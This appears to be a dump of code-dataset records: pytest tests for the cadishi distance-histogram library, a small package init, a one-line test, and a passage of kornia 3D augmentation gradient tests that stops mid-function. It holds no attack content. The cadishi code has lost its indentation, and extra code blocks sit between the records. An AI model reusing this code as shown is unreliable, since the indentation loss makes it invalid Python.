] | 14 | 2017-08-22T13:00:42.000Z | 2021-11-19T14:07:55.000Z | cadishi/tests/test_pydh_cudh.py | bio-phys/cadishi | b44351fcb77737c6a6da5249a0c24ee8e34f72d2 | [
"MIT"
] | 1 | 2021-11-19T14:07:38.000Z | 2021-11-19T14:07:38.000Z | cadishi/tests/test_pydh_cudh.py | bio-phys/cadishi | b44351fcb77737c6a6da5249a0c24ee8e34f72d2 | [
"MIT"
] | null | null | null | # -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding: utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# Cadishi --- CAlculation of DIStance HIstograms
#
# Copyright (c) Klaus Reuter, Juergen Koefinger
# See the file AUTHORS.rst for the full list of contributors.
#
# Released under the MIT License, see the file LICENSE.txt.
"""A set of unit tests for the pydh CPU and cudh GPU histogram modules.
"""
from __future__ import print_function
from builtins import str
from builtins import range
import os
import sys
import numpy as np
import glob
import math
import multiprocessing
import pytest
from cadishi import util
# --- select the modules to be tested via environment variables
TEST_PYDH = bool(int(os.environ.get("TEST_PYDH", "1")))
TEST_CUDH = bool(int(os.environ.get("TEST_CUDH", "0")))
# --- toggle large test case which may take a long time
TEST_LARGE = bool(int(os.environ.get("TEST_LARGE", "0")))
# --- toggle extra-large test case which may take even longer
TEST_XLARGE = bool(int(os.environ.get("TEST_XLARGE", "0")))
# --- dump the histograms from the medium and large problem sets for manual inspection
DUMP_DATA = bool(int(os.environ.get("DUMP_DATA", "0")))
# --- global variables ---
# r_max, coordinates are in a unit box
r_max = math.sqrt(3.0)
# --- set up the number of threads to be tested, depending on the machine
n_cores = multiprocessing.cpu_count()
n_threads = [1]
while (n_threads[-1] < n_cores):
n_threads.append(2 * n_threads[-1])
if (n_threads[-1] > n_cores):
n_threads.pop()
n_threads.remove(1)
print("n_threads = " + str(n_threads))
# --- import the dist module which serves as the reference implementation
from cadishi.kernel import dist
# --- import the pydh module
from cadishi.kernel import pydh
# --- import the cudh module
if TEST_CUDH:
try:
from cadishi.kernel import cudh
except Exception as e:
print("Error importing >> cudh <<. Disabling CUDA tests.")
print("Exception message : " + e.message)
TEST_CUDH = False
if TEST_CUDH:
# test if we are able to run the tests at all
if (cudh.get_num_devices() == 0):
print("No usable CUDA device detected. Disabling CUDA tests.")
TEST_CUDH = False
else:
print("CUDA tests: " + str(cudh.get_num_devices()) + " GPUs detected.")
def get_triclinic_box():
"""Return an (arbitrarily defined) triclinic box."""
return np.asarray([0.66, 0.75, 0.88, 33., 45., 66.])
def get_orthorhombic_triclinic_box():
"""Return an (arbitrarily defined) orthorhombic box (using a triclinic specifier)."""
return np.asarray([0.66, 0.75, 0.88, 90., 90., 90.])
def get_orthorhombic_box():
"""Return an (arbitrarily defined) orthorhombic box."""
box = np.zeros((3, 3))
box[0][0] = 0.66
box[1][1] = 0.75
box[2][2] = 0.88
return box
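# get_triclinic_box() above specifies a cell as (a, b, c, alpha, beta, gamma) in degrees.
# For reference, the standard conversion of such a specifier into a 3x3 cell matrix
# (lower-triangular convention) is sketched below; this is only an illustration and not
# necessarily the conversion cadishi performs internally.
def box_vectors(a, b, c, alpha, beta, gamma):
    al, be, ga = np.radians([alpha, beta, gamma])
    bx, by = b * np.cos(ga), b * np.sin(ga)
    cx = c * np.cos(be)
    cy = c * (np.cos(al) - np.cos(be) * np.cos(ga)) / np.sin(ga)
    cz = np.sqrt(c ** 2 - cx ** 2 - cy ** 2)
    return np.array([[a, 0.0, 0.0], [bx, by, 0.0], [cx, cy, cz]])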
testcase_small = None
@pytest.fixture
def fixture_small():
"""Create a reference case using the very first dist implementation."""
global testcase_small
if testcase_small is None:
n_atoms = [2847, 3918]
n_bins = 1000
coords = util.generate_random_coordinate_set(n_atoms)
histo = dist.histograms(coords, r_max, n_bins)
# if DUMP_DATA:
# file_name = sys._getframe().f_code.co_name + ".dat"
# util.dump_histograms(file_name, histo, r_max, n_bins)
testcase_small = (n_atoms, n_bins, coords, histo)
return testcase_small
testcase_small_orthorhombic = None
@pytest.fixture
def fixture_small_orthorhombic():
"""Create a orthorhombic reference case in double precision using pydh."""
global testcase_small_orthorhombic
if testcase_small_orthorhombic is None:
n_atoms = [2847, 3918]
n_bins = 1000
coords = util.generate_random_coordinate_set(n_atoms)
box = get_orthorhombic_box()
histo = pydh.histograms(coords, r_max, n_bins, box=box, precision="double", n_threads=1)
testcase_small_orthorhombic = (n_atoms, n_bins, coords, box, histo)
return testcase_small_orthorhombic
testcase_small_triclinic = None
@pytest.fixture
def fixture_small_triclinic():
"""Create a triclinic reference case in double precision using pydh."""
global testcase_small_triclinic
if testcase_small_triclinic is None:
n_atoms = [2847, 3918]
n_bins = 1000
coords = util.generate_random_coordinate_set(n_atoms)
box = get_triclinic_box()
histo = pydh.histograms(coords, r_max, n_bins, box=box, precision="double", n_threads=1)
testcase_small_triclinic = (n_atoms, n_bins, coords, box, histo)
return testcase_small_triclinic
if TEST_PYDH:
def test_pydh_small_double_blocked(fixture_small):
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for nt in n_threads:
histo_blocked = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=nt, blocksize=200, check_input=check_input)
util.compare(histo_ref, histo_blocked)
def test_pydh_small_double(fixture_small):
"""Test if pydh gives the same answer as dist()."""
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
histo = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo)
def test_n_threads_small_double(fixture_small):
"""Test if pydh gives the same answer as dist()."""
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_small_single(fixture_small):
"""Test if pydh gives the same answer as dist()."""
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_small_single(fixture_small):
"""Test if pydh gives the same answer as dist()."""
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_small_orthorhombic_single(fixture_small_orthorhombic):
"""Test if the orthorhombic implementation gives the same answer in single precision."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_orthorhombic
for check_input in [True, False]:
histo = pydh.histograms(coords, r_max, n_bins, box=box, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo)
def test_pydh_small_triclinic_single(fixture_small_triclinic):
"""Test if the triclinic implementation gives the same answer in single precision."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_triclinic
for check_input in [True, False]:
histo = pydh.histograms(coords, r_max, n_bins, box=box, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo)
def test_pydh_small_orthorhombic_triclinic(fixture_small_triclinic):
"""Test if the triclinic and orthorhombic implementations give the same answer for an orthorhombic box."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_triclinic
box_ort = get_orthorhombic_box()
box_tri = get_orthorhombic_triclinic_box()
for precision in ['single', 'double']:
for check_input in [True, False]:
histo_ort = pydh.histograms(coords, r_max, n_bins, box=box_ort, force_triclinic=False,
precision=precision, n_threads=1, check_input=check_input)
histo_tri = pydh.histograms(coords, r_max, n_bins, box=box_tri, force_triclinic=True,
precision=precision, n_threads=1, check_input=check_input)
util.compare(histo_ort, histo_tri)
if TEST_CUDH:
def test_cudh_small_double(fixture_small):
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo)
def test_cudh_small_single(fixture_small):
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo)
def test_cudh_small_orthorhombic(fixture_small_orthorhombic):
"""Check if pydh and cudh give the same answer with orthorhombic boxes."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_orthorhombic
for precision in ['single', 'double']:
for check_input in [True, False]:
for algo in [1, 2, 3]:
histo = cudh.histograms(coords, r_max, n_bins, box=box, precision=precision,
check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo)
def test_cudh_small_triclinic(fixture_small_triclinic):
"""Check if pydh and cudh give the same answer with triclinic boxes."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_triclinic
for precision in ['single', 'double']:
for check_input in [True, False]:
for algo in [1, 2, 3]:
histo = cudh.histograms(coords, r_max, n_bins, box=box, precision=precision,
check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo)
def test_cudh_small_orthorhombic_triclinic(fixture_small_triclinic):
"""Test if the triclinic and orthorhombic implementations give the same answer for an orthorhombic box."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_triclinic
box_ort = get_orthorhombic_box()
box_tri = get_orthorhombic_triclinic_box()
for precision in ['single', 'double']:
for check_input in [True, False]:
for algo in [1, 2, 3]:
histo_ort = cudh.histograms(coords, r_max, n_bins, box=box_ort, force_triclinic=False,
precision=precision, check_input=check_input, algorithm=algo)
histo_tri = cudh.histograms(coords, r_max, n_bins, box=box_tri, force_triclinic=True,
precision=precision, check_input=check_input, algorithm=algo)
util.compare(histo_ort, histo_tri)
testcase_small_invalid = None
@pytest.fixture
def fixture_small_invalid():
global testcase_small_invalid
if testcase_small_invalid is None:
n_atoms = [2000, 1000]
n_bins = 1000
coords = util.generate_random_coordinate_set(n_atoms, blowup_factor=3.14)
histo_ref = None
testcase_small_invalid = (n_atoms, n_bins, coords, histo_ref)
return testcase_small_invalid
if TEST_PYDH:
def test_pydh_invalid_small_double(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
with pytest.raises(ValueError):
pydh.histograms(coords, r_max, n_bins, precision="double", n_threads=1, check_input=True)
def test_pydh_invalid_threads_small_double(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
for nt in n_threads:
with pytest.raises(ValueError):
pydh.histograms(coords, r_max, n_bins, precision="double", n_threads=nt, check_input=True)
def test_pydh_invalid_small_single(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
with pytest.raises(ValueError):
pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=1, check_input=True)
def test_pydh_invalid_threads_small_single(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
for nt in n_threads:
with pytest.raises(ValueError):
pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=nt, check_input=True)
if TEST_CUDH:
def test_cudh_invalid_small_double(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
for gpu_id in range(cudh.get_num_devices()):
with pytest.raises(ValueError):
cudh.histograms(coords, r_max, n_bins, precision="double", gpu_id=gpu_id, check_input=True)
def test_cudh_invalid_small_single(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
for gpu_id in range(cudh.get_num_devices()):
with pytest.raises(ValueError):
cudh.histograms(coords, r_max, n_bins, precision="single", gpu_id=gpu_id, check_input=True)
testcase_medium = None
@pytest.fixture
def fixture_medium():
global testcase_medium
if testcase_medium is None:
n_atoms = [3000, 1000, 5000, 3500]
n_bins = 8192
coords = util.generate_random_coordinate_set(n_atoms)
histo_ref = dist.histograms(coords, r_max, n_bins)
testcase_medium = (n_atoms, n_bins, coords, histo_ref)
return testcase_medium
if TEST_PYDH:
def test_pydh_medium_double(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_medium_double(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_medium_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_medium_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_medium_masked_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
n_el = len(n_atoms)
mask_array = np.ones(n_el * (n_el + 1) // 2)
mask_array[::2] = 0
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, mask_array=mask_array, check_input=check_input)
col_sum = histo_pydh.sum(axis=0)
assert(np.sum(col_sum[1::2]) == 0)
def test_pydh_medium_scaled_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
n_el = len(n_atoms)
scale_factors = np.ones(n_el * (n_el + 1) // 2)
scale_factors *= 0.5
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, scale_factors=scale_factors, check_input=check_input)
assert(histo_ref.sum() == 2.0 * histo_pydh.sum())
if TEST_CUDH:
def test_cudh_medium_double(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_medium_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_medium_masked_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
n_el = len(n_atoms)
mask_array = np.ones(n_el * (n_el + 1) // 2)
mask_array[::2] = 0
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, mask_array=mask_array, check_input=check_input, algorithm=algo)
col_sum = histo_cudh.sum(axis=0)
assert(np.sum(col_sum[1::2]) == 0)
def test_cudh_medium_scaled_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
n_el = len(n_atoms)
scale_factors = np.ones(n_el * (n_el + 1) // 2)
scale_factors *= 0.5
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single", gpu_id=gpu_id,
scale_factors=scale_factors, check_input=check_input, algorithm=algo)
assert(histo_ref.sum() == 2.0 * histo_cudh.sum())
# test case designed to select the simple kernels in cudh
testcase_medium_manybins = None
@pytest.fixture
def fixture_medium_manybins():
global testcase_medium_manybins
if testcase_medium_manybins is None:
n_atoms = [3000, 5000, 3500]
n_bins = 68000
coords = util.generate_random_coordinate_set(n_atoms)
histo_ref = dist.histograms(coords, r_max, n_bins)
testcase_medium_manybins = (n_atoms, n_bins, coords, histo_ref)
return testcase_medium_manybins
if TEST_PYDH:
def test_pydh_medium_manybins_double(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_medium_manybins_double(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_medium_manybins_single(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_medium_manybins_single(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
if TEST_CUDH:
def test_cudh_medium_manybins_double(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_medium_manybins_single(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo_cudh)
if TEST_LARGE:
testcase_large = None
@pytest.fixture
def fixture_large():
global testcase_large
if testcase_large is None:
n_atoms = [105000, 110000, 133000]
n_bins = 16000
coords = util.generate_random_coordinate_set(n_atoms)
# --- note that we use pydh to generate the test dataset
histo_ref = pydh.histograms(coords, r_max, n_bins, precision="double", n_threads=n_threads[-1])
testcase_large = (n_atoms, n_bins, coords, histo_ref)
return testcase_large
if TEST_PYDH:
def test_pydh_large_single(fixture_large):
n_atoms, n_bins, coords, histo_ref = fixture_large
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=1)
util.compare(histo_ref, histo_pydh)
def test_n_threads_large_single(fixture_large):
n_atoms, n_bins, coords, histo_ref = fixture_large
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=nt)
util.compare(histo_ref, histo_pydh)
if TEST_CUDH:
def test_cudh_large_double(fixture_large):
n_atoms, n_bins, coords, histo_ref = fixture_large
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_large_single(fixture_large):
n_atoms, n_bins, coords, histo_ref = fixture_large
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, algorithm=algo)
util.compare(histo_ref, histo_cudh)
if TEST_XLARGE:
testcase_xlarge = None
@pytest.fixture
def fixture_xlarge():
global testcase_xlarge
if testcase_xlarge is None:
n_atoms = [250000, 275000, 225000]
n_bins = 18000
coords = util.generate_random_coordinate_set(n_atoms)
# --- note that we use pydh to generate the test dataset, max number of threads and no blocking
histo_ref = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=n_threads[-1], blocksize=-1)
testcase_xlarge = (n_atoms, n_bins, coords, histo_ref)
return testcase_xlarge
if TEST_PYDH:
def test_n_threads_xlarge_single(fixture_xlarge):
n_atoms, n_bins, coords, histo_ref = fixture_xlarge
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=nt)
util.compare(histo_ref, histo_pydh)
if TEST_CUDH:
def test_cudh_xlarge_double(fixture_xlarge):
n_atoms, n_bins, coords, histo_ref = fixture_xlarge
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_xlarge_single(fixture_xlarge):
n_atoms, n_bins, coords, histo_ref = fixture_xlarge
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, algorithm=algo)
util.compare(histo_ref, histo_cudh)
| 45.180135 | 127 | 0.63215 | 3,553 | 26,837 | 4.469181 | 0.074866 | 0.034637 | 0.016374 | 0.029473 | 0.817747 | 0.804459 | 0.770452 | 0.747276 | 0.734177 | 0.716607 | 0 | 0.015398 | 0.281291 | 26,837 | 593 | 128 | 45.256324 | 0.80786 | 0.088795 | 0 | 0.5898 | 0 | 0 | 0.021198 | 0 | 0 | 0 | 0 | 0 | 0.008869 | 1 | 0.117517 | false | 0 | 0.033259 | 0 | 0.175166 | 0.013304 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
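# The fixtures above use dist.histograms / pydh.histograms as reference implementations.
# The conceptual operation, binning all pairwise distances between (and within) coordinate
# sets up to r_max, can be sketched in plain NumPy as below. This illustrates what the
# kernels compute; it is not the cadishi API, and the real kernels' output layout
# (ordering of species-pair columns) is more involved.
import numpy as np

def pair_distance_histogram(coords_a, coords_b, r_max, n_bins):
    """Histogram of all inter-set distances, brute force (O(N*M) memory)."""
    diff = coords_a[:, None, :] - coords_b[None, :, :]
    dist = np.sqrt((diff ** 2).sum(axis=-1))
    hist, _ = np.histogram(dist.ravel(), bins=n_bins, range=(0.0, r_max))
    return hist

def intra_distance_histogram(coords, r_max, n_bins):
    """Histogram over unique pairs within a single coordinate set."""
    idx_i, idx_j = np.triu_indices(len(coords), k=1)
    dist = np.linalg.norm(coords[idx_i] - coords[idx_j], axis=1)
    hist, _ = np.histogram(dist, bins=n_bins, range=(0.0, r_max))
    return hist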
534b34820a671b7126cecbafe18c76ed51f7556e | 283 | py | Python | src/SocialNetwork_API/services/__init__.py | mungpham/mungpham | 3545dafdb498503d2f138d4b7515a7ae8f195994 | [
"MIT"
] | null | null | null | src/SocialNetwork_API/services/__init__.py | mungpham/mungpham | 3545dafdb498503d2f138d4b7515a7ae8f195994 | [
"MIT"
] | null | null | null | src/SocialNetwork_API/services/__init__.py | mungpham/mungpham | 3545dafdb498503d2f138d4b7515a7ae8f195994 | [
"MIT"
] | null | null | null | from SocialNetwork_API.services.post import PostService
from SocialNetwork_API.services.comment import CommentService
from SocialNetwork_API.services.data import DataService
from SocialNetwork_API.services.user import UserService
from SocialNetwork_API.services.api import ApiService | 56.6 | 61 | 0.897527 | 35 | 283 | 7.114286 | 0.4 | 0.341365 | 0.401606 | 0.562249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067138 | 283 | 5 | 62 | 56.6 | 0.943182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5366f1fb352e39c51dff6b33255ff547b09e1df7 | 13 | py | Python | test/test_decl.py | HouQiming/ama | b7dddb425892e1d4d95312b330061911489e242b | [
"BSD-2-Clause"
] | 24 | 2022-01-06T20:26:42.000Z | 2022-02-18T07:56:44.000Z | test/test_decl.py | HouQiming/ama | b7dddb425892e1d4d95312b330061911489e242b | [
"BSD-2-Clause"
] | null | null | null | test/test_decl.py | HouQiming/ama | b7dddb425892e1d4d95312b330061911489e242b | [
"BSD-2-Clause"
] | 4 | 2022-01-06T20:26:44.000Z | 2022-01-14T06:59:48.000Z | a,b,c=(d,e,)
| 6.5 | 12 | 0.384615 | 5 | 13 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 13 | 1 | 13 | 13 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7280c58790fb8e1a2e8d46cf1a85d45f3222d323 | 14,415 | py | Python | test/augmentation/test_backward_3d.py | AK391/kornia | a2535eb7593ee2fed94d23cc720804a16f9f0e7e | [
"ECL-2.0",
"Apache-2.0"
] | 4,894 | 2019-10-24T15:51:39.000Z | 2022-03-30T22:58:33.000Z | test/augmentation/test_backward_3d.py | AK391/kornia | a2535eb7593ee2fed94d23cc720804a16f9f0e7e | [
"ECL-2.0",
"Apache-2.0"
] | 912 | 2019-10-24T16:08:42.000Z | 2022-03-31T19:07:09.000Z | test/augmentation/test_backward_3d.py | AK391/kornia | a2535eb7593ee2fed94d23cc720804a16f9f0e7e | [
"ECL-2.0",
"Apache-2.0"
] | 557 | 2019-10-24T16:02:43.000Z | 2022-03-28T07:33:33.000Z | import pytest
import torch
import torch.nn as nn
from kornia.augmentation import RandomAffine3D, RandomMotionBlur3D, RandomPerspective3D, RandomRotation3D
class TestRandomAffine3DBackward:
@pytest.mark.parametrize(
"degrees",
[
10,
[10.0, 20.0],
[10.0, 20.0, 30.0],
[(10, 20), (10, 20), (10, 20)],
torch.tensor(10.0),
torch.tensor([10.0, 20.0]),
torch.tensor([10, 20, 30]),
torch.tensor([(10, 20), (10, 20), (10, 20)]),
],
)
@pytest.mark.parametrize("translate", [[0.1, 0.2, 0.3], torch.tensor([0.1, 0.2, 0.3])])
@pytest.mark.parametrize(
"scale",
[
[0.1, 0.2],
[(0.1, 0.2), (0.1, 0.2), (0.1, 0.2)],
torch.tensor([0.1, 0.2]),
torch.tensor([(0.1, 0.2), (0.1, 0.2), (0.1, 0.2)]),
],
)
@pytest.mark.parametrize(
"shear",
[
10.0,
[10.0, 20.0],
[10.0, 20.0, 30.0, 40.0, 50.0, 60.0],
[(-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0)],
torch.tensor(10),
torch.tensor([10, 20]),
torch.tensor([10.0, 20.0, 30.0, 40.0, 50.0, 60.0]),
torch.tensor([(-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0)]),
],
)
@pytest.mark.parametrize("resample", ['bilinear']) # TODO: Ignore nearest for now.
@pytest.mark.parametrize("align_corners", [True, False])
@pytest.mark.parametrize("return_transform", [True, False])
@pytest.mark.parametrize("same_on_batch", [True, False])
def test_param(
self, degrees, translate, scale, shear, resample, align_corners, return_transform, same_on_batch, device, dtype
):
_degrees = (
degrees
if isinstance(degrees, (int, float, list, tuple))
else nn.Parameter(degrees.clone().to(device=device, dtype=dtype))
)
_translate = (
translate
if isinstance(translate, (int, float, list, tuple))
else nn.Parameter(translate.clone().to(device=device, dtype=dtype))
)
_scale = (
scale
if isinstance(scale, (int, float, list, tuple))
else nn.Parameter(scale.clone().to(device=device, dtype=dtype))
)
_shear = (
shear
if isinstance(shear, (int, float, list, tuple))
else nn.Parameter(shear.clone().to(device=device, dtype=dtype))
)
torch.manual_seed(0)
input = torch.randint(255, (2, 3, 10, 10, 10), device=device, dtype=dtype) / 255.0
aug = RandomAffine3D(
_degrees,
_translate,
_scale,
_shear,
resample,
align_corners=align_corners,
return_transform=return_transform,
same_on_batch=same_on_batch,
p=1.0,
)
if return_transform:
output, _ = aug(input)
else:
output = aug(input)
if len(list(aug.parameters())) != 0:
mse = nn.MSELoss()
opt = torch.optim.SGD(aug.parameters(), lr=10)
loss = mse(output, torch.ones_like(output) * 2) # to ensure that a big loss value could be obtained
loss.backward()
opt.step()
if not isinstance(degrees, (int, float, list, tuple)):
assert isinstance(aug.degrees, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.degrees.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.degrees._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (degrees.to(device=device, dtype=dtype) - aug.degrees.data).sum() == 0
else:
assert (degrees.to(device=device, dtype=dtype) - aug.degrees.data).sum() != 0
if not isinstance(translate, (int, float, list, tuple)):
assert isinstance(aug.translate, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.translate.is_cuda:
